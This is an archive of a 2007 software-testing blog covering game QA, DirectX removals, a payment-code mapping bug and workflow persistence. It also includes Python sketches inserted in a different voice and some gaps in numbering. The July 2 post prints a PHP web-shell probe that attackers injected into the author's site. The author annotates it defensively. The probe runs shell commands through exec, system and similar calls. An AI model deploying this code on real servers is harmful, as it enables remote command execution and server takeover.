July 31, 2007

Since Technorati shows no sign of finding a way to get rid of the unwanted spam links (I'm in the top 5,000 now with an authority of 610), I figure I may as well try to use my increased rank to try to help out some other sites...steal traffic from the spammers and give to those who need it. Some I've linked to before, others not at all.

Quality Assurance

Game QA Blog - Just over a year old, Zachary's writing seems to be following the same path that mine did for the longest time. Starts out rather idealistic in many ways, and then realism sets in and the important thing becomes figuring out which ideals to stick to and which ones you can trade to get the work done.

Climactic Avenue - Sam Kalman started out doing certification testing, then went to doing contract testing for business software, and is now working on Unity.

Development

AIGameDev.com - Great feed that's been going over theory, some nuts and bolts plumbing and optimization tips on game AI. Very C++ focused, but many of the template tips and tricks work just as well with VB.NET and C#.

Coding Horror - I may not always agree with Jeff Atwood, but I agree with him more often than not.

Worse than Failure - Formerly "The Daily WTF," this blog is a daily must-read for any developer. If you see something and don't understand why it's a WTF, you've just learned about a hole in your skillset.

MSDN Magazine - I'm still amazed at how many people don't know this, but MSDN puts all of their magazine's content and code up on the site at the same time as the issue ships. You can read the entire issue online...without ads.

GameDev.net/DevMaster.net - The basic information that you need to solve just about any game development problem can be found on one of these two sites.

The Z-Buffer - A great starting point for finding XNA and Managed DirectX information. Andy, you need to find more things to update about.

Annals of Oracle's Improbable Errors - Working with Oracle is a nightmare. Working with Oracle via .NET can be even worse. For someone with a SQL Server background, a site like this is a godsend. While lately it has been a bit focused on Oracle application server issues, any major Oracle issue you have probably has an entry here.

AddressOf.com - Cory's VB/.NET focused blog. Like me, he gets very angry when a first-class language gets relegated to the position of red-headed stepchild.

4) XACT session windows. I know a couple of audio designers who are currently spooging over this. I can't speak for it one way or another, but they're loving the idea of it. They'll let me know if it's a major improvement.

6) Removals. This is the biggie because this is the last version that will have any of the below. Let's go over the removals one by one.

a) Direct3D 8 and below and DX8-era HRESULT conversion routines. I'm glad for this. DirectX 9.0 is a mature API, and while backwards compatibility will remain part of the operating system, it's time for coders to move on.

c) DirectAnimation. This was essentially "DirectX talks to web pages." With support gone in IE7, it's a good removal.

d) DirectMusic. I knew it was coming, but it's still sad to see DirectMusic go. There were a few great usage scenarios for DirectMusic that still aren't directly covered by XACT, DirectSound or XAudio2, but it's a good API that has run its course.

e) DirectInput 7 and below. Microsoft's guidance for the last eighteen months has been to use a combination of XInput and Windows messages instead of DirectInput, and to be honest, while the code may be slightly more complex, it's a bit more stable that way.

f) DirectPlay. While I'd like to see some supported network sample code for WinSock and XSockets (the Games for Windows - LIVE version of WinSock), DirectPlay really ran its course years ago. The last production game that I'm aware of that used DirectPlay was "Microsoft Golf 2001 Edition." (Yes, "Links LS 1998" up through "Microsoft Golf 2001 Edition" used DirectPlay for networking.)

g) DirectPlayVoice. Useless without DirectPlay, so a good cut.

h) Managed DirectX samples and documentation. This is the only cut that pisses me off. I know that XNA is supposed to supplant Managed DirectX, but you'd think they could have at least waited until they had a version of XNA Game Studio that would integrate with all Visual Studio SKU's before killing MDX. Of course, since there were deprecated assemblies for DirectMusic, DirectInput and DirectPlay, I guess it was inevitable given the above.

July 28, 2007

I woke up feeling pretty good about myself. The new server was supposed to go live the evening before, and it had passed all of its production tests prior to my going to bed. Before going to bed, I'd even set my BlackBerry on loud so that if anything did go wrong, it would wake either myself, my wife or my granddaughter up so it could be taken care of. The red blinking light and the vibrating BlackBerry told me that there seemed to be a difference of opinion between me and RIM about what "loud" meant.

"Half of our credit card transactions are getting denied and we don't know why." Needless to say, that made me panic a bit. That portion of the server had been tested non-stop for nearly a month. It was the first part of the server to get completed, so it not working really threw me for a loop.

I VPN'ed into the server and looked at the audit logs. Sure enough, there was some goofy error code there that I had never seen before. I logged into our credit card processor's site and saw that the code was an Address Verification System failure. I went back to my code and saw that I had a check in place for AVS failures that had passed unit tests against their test system, but it was looking for a different error code.

Now, these people's cards would have been denied anyway, but they were getting the incorrect message. I was abstracting the processor code behind an enum of my own, so instead of code 101, they'd be getting CreditCardResult.DeniedMissingInfo and instead of code 204, they'd be getting back CreditCardResult.DeniedOverLimit. Any code that I didn't recognize that was a failure would come back as CreditCardResult.DeniedOther. The number of things that could result in DeniedOther was fairly small, but because the code I was getting back differed between test and production, AVS failures were returning DeniedOther instead of DeniedAVS.

Others were showing different errors. The bad card number error code was being used for missing card information, and other things weren't matching up either.

I spent a few minutes looking to see which codes were being returned for which values and I was rather disturbed by the change. Did our tests pass because we were using values under $25? How did our test environment differ from our production environment?

After digging a bit deeper, I found the reason. Our test environment on the processor server side had been using GPN on the back end instead of Global Collect. For them, AVS errors were code 203 instead of code 200. All of the failure codes varied slightly as a result.

A quick bit of code to detect if we were in production or test and a quick mapping table for the correct codes to the proper environment, and all would be good again once the next production build was pushed live.
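
The fix described above can be sketched roughly as follows. This is a minimal Python illustration, not the original .NET code. The result names come from the post; the function name `map_failure`, the environment labels, and the assignment of codes 101 and 204 to the test table are assumptions made for the example. The AVS codes follow my reading of the post (203 on the test back end, 200 in production).

```python
from enum import Enum


class CreditCardResult(Enum):
    DENIED_MISSING_INFO = "DeniedMissingInfo"
    DENIED_OVER_LIMIT = "DeniedOverLimit"
    DENIED_AVS = "DeniedAVS"
    DENIED_OTHER = "DeniedOther"


# One lookup table per environment, keyed by the processor's failure code.
# Only the AVS codes are taken from the post; placing 101 and 204 in the
# test table is an assumption for illustration.
CODE_TABLES = {
    "test": {
        101: CreditCardResult.DENIED_MISSING_INFO,
        204: CreditCardResult.DENIED_OVER_LIMIT,
        203: CreditCardResult.DENIED_AVS,
    },
    "production": {
        200: CreditCardResult.DENIED_AVS,
        # The remaining production codes are not given in the post.
    },
}


def map_failure(environment: str, code: int) -> CreditCardResult:
    """Translate a processor failure code using the table for this environment."""
    table = CODE_TABLES[environment]
    # Any failure code the table does not know falls back to DeniedOther.
    return table.get(code, CreditCardResult.DENIED_OTHER)
```

Keeping the tables as data rather than branching in code means a processor change only needs a table update, and an unrecognized code still degrades to DeniedOther instead of failing outright.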

July 27, 2007

Nothing is more depressing in software development than hitting all your deadlines and then having your product stopped in its tracks due to an external dependency.

Twenty minutes ago, I should have thrown the switch on the new multicurrency system, but due to a hitch with an external partner, I'm stuck here twiddling my thumbs, waiting for them to finish dotting their "I"s and crossing their "T"s.

Blech.

Of course, the coming 96 hours are going to be fun in and of themselves. I'm the support back home for a conference that's going on in a different country, which means that the vast majority of my last week with my granddaughter is going to be spent stuck at home next to a laptop VPN'ed into our network.

Take a break. Visit the Shack. Check E-mail; feel bad that there are over 300 unread messages. Check the automated error E-mails. Wonder why the wife called you and complained that her keyboard's "N" key broke.

July 23, 2007

For the past year, I've been trying to keep close tabs on my bandwidth usage so that I can properly estimate what it would cost to switch over to a colocated server.

I put 99% of my images on a subdomain to improve loading times on the site as well as to separate out the bandwidth for tracking purposes.

Right now, I serve between 800MB and 1.2GB a month of HTML, and between 2GB and 6GB of all non-HTML files per month.

Now that I've got my stats fairly locked down, I need to start doing some heavy-duty bandwidth estimations on some of the other items that I'm planning on offering. I also need to start pricing out 1U servers.
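
As a starting point for that kind of estimate, here is a small Python sketch that turns the monthly figures above into a total and an average sustained rate. It reads the figures as megabytes and gigabytes, uses decimal units and a 30-day month, and the function names are made up for the example. An average says nothing about peak load, so treat it as a floor rather than a sizing number.

```python
SECONDS_PER_MONTH = 30 * 24 * 60 * 60  # assumes a 30-day month


def monthly_total_gb(html_gb: float, other_gb: float) -> float:
    """Total transfer per month in gigabytes."""
    return html_gb + other_gb


def average_kbps(total_gb: float) -> float:
    """Average sustained rate in kilobits per second (decimal units)."""
    bits = total_gb * 1_000_000_000 * 8
    return bits / SECONDS_PER_MONTH / 1_000


# Low and high ends of the ranges quoted in the post.
low_total = monthly_total_gb(0.8, 2.0)
high_total = monthly_total_gb(1.2, 6.0)

print(f"Monthly total: {low_total:.1f} to {high_total:.1f} GB")
print(f"Average rate: {average_kbps(low_total):.1f} to "
      f"{average_kbps(high_total):.1f} kbit/s")
```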

July 20, 2007

Now I know why PC Gamer UK hasn't published my column online yet. They decided to publish it in PC Gamer US. Would have been nice to know ahead of time so I could properly pimp it.

Anyway, if you can find a copy on shelves, it's Issue #165 (September 2007, Space Siege) on page 16.

The only thing I will say...PC Gamer US rephrased the opening paragraph to eliminate the phrase "chaingun rape." Funny thing to eliminate...I thought it set the tone for what we were going through at the time.

I think the artist did a good job of bringing the attitudes of the characters from Schulz's original work, and I think it's a testament to Schulz that he was able to imbue his characters with so much personality with only three panels a day.

July 18, 2007

I E-mailed Technorati after I noticed that spammers were using links to my blog to try to mask themselves. I'm sure it's the first time in history that they've ever gotten an E-mail complaining that their blog was rated too high.

Obviously, they still haven't figured out how to filter spam links to me.

I'm a fan of test automation. I keep up on all of the latest and greatest automated testing tips and techniques from people like The Braidy Tester. I try to tie as much automated testing as possible into the applications that I write on a regular basis. When it comes to application testing, you won't find many supporters as die-hard as I am. However, I do recognize that test automation has its limits. In games testing, automated testing is for the most part only useful for verification purposes.

What does that mean? It means that you can use automated testing tools in games to verify that content is formatted as described and to a lesser extent verify that the content is "well formed," but unless your regular testers find a repeatable type of content failure and are able to train a tool to identify that particular type of content failure, you won't be able to find what is wrong with your content.

You can use automated tools to automate game UI testing and level load testing, but very little can be done to automate gameplay testing for 99% of the games on the market. You can use automated QA to generate the massive amounts of combinations for combination testing, but you still need a human to evaluate the results in most cases.
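
Generating the combinations is the easy part to automate. The Python sketch below is only an illustration: the dimensions and their values are hypothetical, and it enumerates every combination without trying to judge whether the game behaves correctly for any of them, which is exactly the part that still needs a person.

```python
from itertools import product

# Hypothetical test dimensions; a real game would have its own list.
DIMENSIONS = {
    "difficulty": ["easy", "normal", "hard"],
    "resolution": ["800x600", "1024x768"],
    "language": ["en", "de"],
}


def generate_cases(dimensions):
    """Yield one dict per combination of values across all dimensions."""
    names = list(dimensions)
    for values in product(*(dimensions[name] for name in names)):
        yield dict(zip(names, values))


cases = list(generate_cases(DIMENSIONS))
print(f"{len(cases)} combinations to run and review")
```

The count grows multiplicatively with each added dimension, which is why the generation gets handed to a tool while the evaluation stays with testers.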

You can automate harnesses against backend servers to ensure that the proper errors are thrown and that the proper data is passed back and forth, but you still need humans testing the game itself against the server.

While most applications can gain a real benefit from test automation and can even reduce their test headcount needs via automation, video game testing is almost the last place where flesh and blood cannot be replaced effectively at this time.

July 17, 2007

I'm in the fortunate position to have never been on the contract testing side of things, but I've had contractors working for me both at Microsoft and at Ritual.

While the article may be a partially accurate picture of how contract testing is done off-site (or on-site with Sony), contract testing on-site used to be markedly different. Note, I said "used to be."

Inside Microsoft's Redmond campuses, space is always at a premium. Offices that used to only hold a single person get doubled or tripled up nowadays...and that's for the FTE's. Cramped space doesn't make it any easier to get your work done.

In addition, Microsoft has been shifting their staffing allocations for testing. Back with "Halo 2" for Xbox, there were three test leads, three SDET's, three Bungie FTE testers and five Microsoft FTE testers for a total of fourteen testers. There were also eighteen contract testers on the game...almost but not quite a one-to-one ratio of FTE's to contract testers. Thirty-two credited testers...not bad.

Compare that to "Halo 2" for Vista. Two test leads, seven FTE testers and two credited contractors. They must not have thought it would be very hard to test...after all, it's a port. Of course, then there's the shared Tools & Technology group that is split between every single MGS release, but since they're a shared team, you really can't count them towards test.

So at this point, we have eleven credited testers, or about 33% of the number of testers that "Halo 2" Xbox had. What do you get for that? The poor performance is only the start of the issues with "Halo 2" for Windows Vista. Hell, they didn't even spell "Windows" right in the manual. (See page 31.)

Between trying to spend some quality time with my granddaughter, trying to debug a showstopping issue with the USEMP Alpha (some new code is keeping German from working like it was), and panicking because my glucose test strips started giving me readings that were between 40-70 points high (they're coding wrong), I've had very little time to do much of anything.

The batch of e-Commerce functionality that had to be done for conference is done and now just needs to be tested and bugfixed. On functionality for post-conference, I have four admin-facing pages that need to be polished off where the pages are 99% done and I'm just waiting on stored procedures from my DBA. I've also got about 14 bugs that are not finance related that I need to track down and squash by Tuesday end-of-day.

July 12, 2007

Last night, I hit the code complete milestone on the new finance system at work about eighteen hours ahead of schedule. (Code complete means that all features are functioning and working together.)

Now that the system has hit the code complete milestone, it can start being tested at a deeper level by other people and I can start working on making the system look good because right now the finance system looks like an atrocious mishmash of programmer art and ugly dev HTML.

What has changed since the project was started?

We started out using Windows Workflow Foundation to handle our prolonged workflows, but a few things caused us to jettison WF. WF works great in the following two situations:

1. All workflows will complete while the executing process is running.
2. You will never update the workflow DLL.

If you are working with situation #1, WF works wonderfully. It's able to effectively load balance your workflows in such a way that you can have several client tasks going on at once with no real problem. If you are working with situation #2, WF works great as well because with the persistence services, you're set.

However, if you ever have to update your workflow DLL and you are persisting your workflows between launches, you are screwed. Because WF uses binary serialization to persist your workflows, if the version number for your DLL changes or if you digitally sign your WF DLL or if the footprint for your workflow changes, you lose ownership of the workflow on next launch and can't retrieve it even if you create a manifest file that says it's okay to use the new version. That's fine if your workflows are small cheap tasks, but if your workflow takes several months to execute because of needed human interaction, losing that workflow and all of the data associated with it can be fatal to your project and your career. Even if you restore the old version of the DLL to try to get those workflows back, you're still screwed...they're gone. I wish they had tried to use some of the work that the WCF team had done to make it a bit more robust against change, but I guess you can't have everything.
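
To picture the kind of change tolerance wished for above, one option is to persist long-running state as plain, explicitly versioned data instead of a binary snapshot tied to a particular assembly. The Python sketch below illustrates that idea only. It is not WF or WCF code, and every name in it (`SCHEMA_VERSION`, `save_state`, `load_state`, the `approver` field) is hypothetical.

```python
import json

SCHEMA_VERSION = 2  # hypothetical current version of the stored shape


def save_state(state: dict) -> str:
    """Serialize workflow state together with the schema version that wrote it."""
    return json.dumps({"schema_version": SCHEMA_VERSION, "state": state})


def load_state(payload: str) -> dict:
    """Load state written by this or an older version, upgrading it if needed."""
    record = json.loads(payload)
    state = dict(record["state"])
    version = record.get("schema_version", 1)
    if version < 2:
        # Hypothetical change: version 2 added an "approver" field,
        # so records written by version 1 get a default value.
        state.setdefault("approver", None)
    return state
```

Because the stored form does not depend on the identity of the code that wrote it, a record saved months ago can still be read after the code has been rebuilt, signed, or extended.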

The really sad thing is that the code got significantly simpler after giving WF the boot.

If you're using .NET and want to use the service, note that it does return an XML document back as a string. You'll most likely want to use XPath to pull out the appropriate values.
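
The general approach can be sketched as follows. This example is in Python rather than .NET, and the XML shape, element names, and rate values are all invented for illustration, since the service's real response format isn't shown here. The query uses only simple path and attribute-match syntax of the kind XPath 1.0 supports.

```python
import xml.etree.ElementTree as ET

# Hypothetical response; the real service's format and values will differ.
RESPONSE = """<Rates base="USD">
  <Rate currency="EUR">0.5</Rate>
  <Rate currency="GBP">2.0</Rate>
</Rates>"""


def rate_for(xml_text: str, currency: str) -> float:
    """Parse the XML string and return the multiplier for one currency."""
    root = ET.fromstring(xml_text)
    node = root.find(f"./Rate[@currency='{currency}']")
    if node is None:
        raise KeyError(f"no rate for {currency}")
    return float(node.text)


def convert_from_usd(amount_usd: float, xml_text: str, currency: str) -> float:
    """Multiply a U.S. dollar amount by the rate for the target currency."""
    return amount_usd * rate_for(xml_text, currency)
```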

If .NET supported XPath 2.0, it would be pretty simple. You could just use an XPath query like this to get the amount that you'd have to multiply your U.S. dollar amount by to get the value in the foreign currency:

Third, I've grown to really dislike the SqlDataSource control for one reason and one reason only: When you select your connection string from the dropdown, rather than show the name of the connection string, it shows the connection string so you have no idea if the proper connection string is in use unless you memorize the actual connection string.

I've got multiple connection strings in place depending on which server I'm going to be talking to and what the purpose of the communication is. I'd rather see the name of my connection string, like "Oracle.ReadOnly" or "Sql.Finance.ReadWrite" instead of the actual connection string.

I'll try to do a more thorough post-mortem once it's all over. In the meantime, I need to go get some food. I'm on day six without any glipizide and while my morning readings have been a little high, my after-meal readings have been in the 140-160 range and that's all that I can ask.

July 11, 2007

I got an E-mail this morning from a former co-worker at Access Software and Microsoft Game Studios who is now working for Terminal Reality here in the Dallas area. Turns out some of the people there read my blog and were wondering if he knew me, but he wasn't immediately able to associate "Michael Russell" with me. I don't blame him, but I should explain. I've already told this story a couple of times here, but it bears repeating.

Back at Microsoft Game Studios in Salt Lake City, we had Michael's and Russell's coming out of every orifice. First names, last names, they all ended up getting muddled, so my name got confused on a regular basis.

One day, I was called up to Dave Curtin's office and he started ripping into me for some items and I honestly had no idea what he was talking about. I told him so and he started going into some more detail and I realized that he wasn't talking about me, he was talking about Michael Burge. He seemed shocked that he was ripping into the wrong Michael, but he then transitioned over to some other negative items that he had heard about. Again, I didn't understand what he was talking about, but after listening for a few more minutes, I realized that he was talking about Russell Jenkins. Another rant followed, but then it became clear he was talking about Russell Hunter.

At that point, I figured I better come up with some way to differentiate myself in his eyes. Now back then, every day at lunchtime was either "Age of Empires II" or "Rainbow Six," and my character name was always "Rom." Likewise, everyone else who participated on a regular basis went by their alias: Ron was Drogo, Russ was Jinx, Sandeep was El Toro, Chris was Wedgemaster, Seth was Madhatterguy, Kevin H. was Remoh, Kevin C. was Banzai, Mike B. couldn't settle on just one and so on. Our aliases were interchangeable with our names during regular conversations around the office.

I told Dave that since he was confusing me with other people, and since everyone in my department already called me Rom, he should just call me Rom. A lightbulb went off in his head as I think he had heard other people talking about Rom and just not put two and two together.

The practical upshot of this was that I was instantly memorable and was no longer being confused with other people. The downside, though, is that people have to mentally shift gears to remember me by my real name. I've had people who do reference checks tell me that they would ask about me by name and the person on the other end would go, "Michael....OH! You mean Rom...yeah, he..."

So over the last few years, I've made a conscious effort to keep my real name at the forefront and use my alias only as a backup and it did make a difference. In a little under two years after returning to the industry, I'm now recognized by name when I talk with other game developers which is almost unheard of for someone in QA.

Eventually, RomSteady may be as well-known as a moniker as CliffyB, but for now, I'm happy having my name be known. It may take some time to remerge my past with my name, but I'm building a history I can be proud of.

Remember, you may have a bug-free game engine, but bugs in your data will often frustrate your users more than a crash would. Especially for games, the rule of thumb is that you generally spend over two thirds of your time testing the data.

I'm still evaluating it so I can't tell you how good (or bad) it is. I can say that it is one of the more complex managed-code engines under the hood, but with good reason. Making an engine is hard. Making a crossplatform engine is harder. Making a crossplatform engine where runtime allocations can kill your performance on one of the platforms definitely sucks.

If you've used Torque X at all and want to share your feedback, this is the place to do it.

July 2, 2007

I've been looking over some of these "hack scripts" that people keep trying to inject into our site, and I'm surprised how...um...efficient some of them can be. Take the one from my last post (stringa.txt) and I'll try to annotate it. Given that I don't know PHP, please correct me if I'm wrong.

// Get the current working directory.
echo "Mic22";  // Print something out to see if the call was allowed.
$OS = @PHP_OS;  // Tell me what OS is running so I can pass on OS-specific bad calls.
echo "OSTYPE:$OS";
$free = disk_free_space($dir);  // How much free space is there that I can hijack?
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."";
$cmd="id";  // Pull a command from the query string so that I can really own this server...
$eseguicmd=ex($cmd);  // Own the server
echo $eseguicmd;  // Reiterate that I owned the server.

function ex($cfe){
  $res = '';  // This is where the result from me owning the server will go.
  if (!empty($cfe)){  // If a command was sent via the query string...
    if(function_exists('exec')){
      @exec($cfe,$res);  // Run the command if "exec" is available to me
      $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){  // If "exec" isn't available, look for shell_exec
      $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){  // Look for the system command
      @ob_start();  // Create an output buffer to store the results of the command I'm going to run
      @system($cfe);
      $res = @ob_get_contents();  // Get and return the results of the command I just ran
      @ob_end_clean();
    }
    elseif(function_exists('passthru')){  // Look for a different security hole...
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){  // Screw it, just try opening a file on the machine so I can find another hole.
      $res = "";
      while(!@feof($f)) { $res .= @fread($f,1024); }
      @pclose($f);
    }
  }
  return $res;
}

You've got to love some of the hacks that people try to do on the net. I've actually been amazed by the sheer quantity of hacks against our servers at work. Fortunately, the vast majority of them have been from idiots.

I spent a large part of today reinstalling Windows XP on my laptop (it just didn't have enough oomph for Vista), and the quantity of updates really shocked me.

I started out with Windows XP Professional with Service Pack 2 slipstreamed. Immediately after installing, I had 89 updates. It took an hour to get and install them, but it was a relatively painless process that installed WMP 11 and IE7 in addition to several patches.

After rebooting, I reran Windows Update and there were a further 11 updates to the updates. Again, relatively quick and painless, but a bit confusing.

After rebooting again, I reran Windows Update and there was 1 update to the updates to the updates.

Grand total: 101 updates. It may not be time for SP3, but it could be considered time for an SP2 Update Rollup.

About Me

Currently Sr. Software Engineer in Test at Netflix. Formerly Sr. Quality Engineer on Firefly at Amazon, QA Manager at Ritual Entertainment, Software Test Lead at Microsoft Game Studios, Director of IT for Meeting Professionals International.

Opinions expressed are my own and do not necessarily represent those of any current, former, or future employer.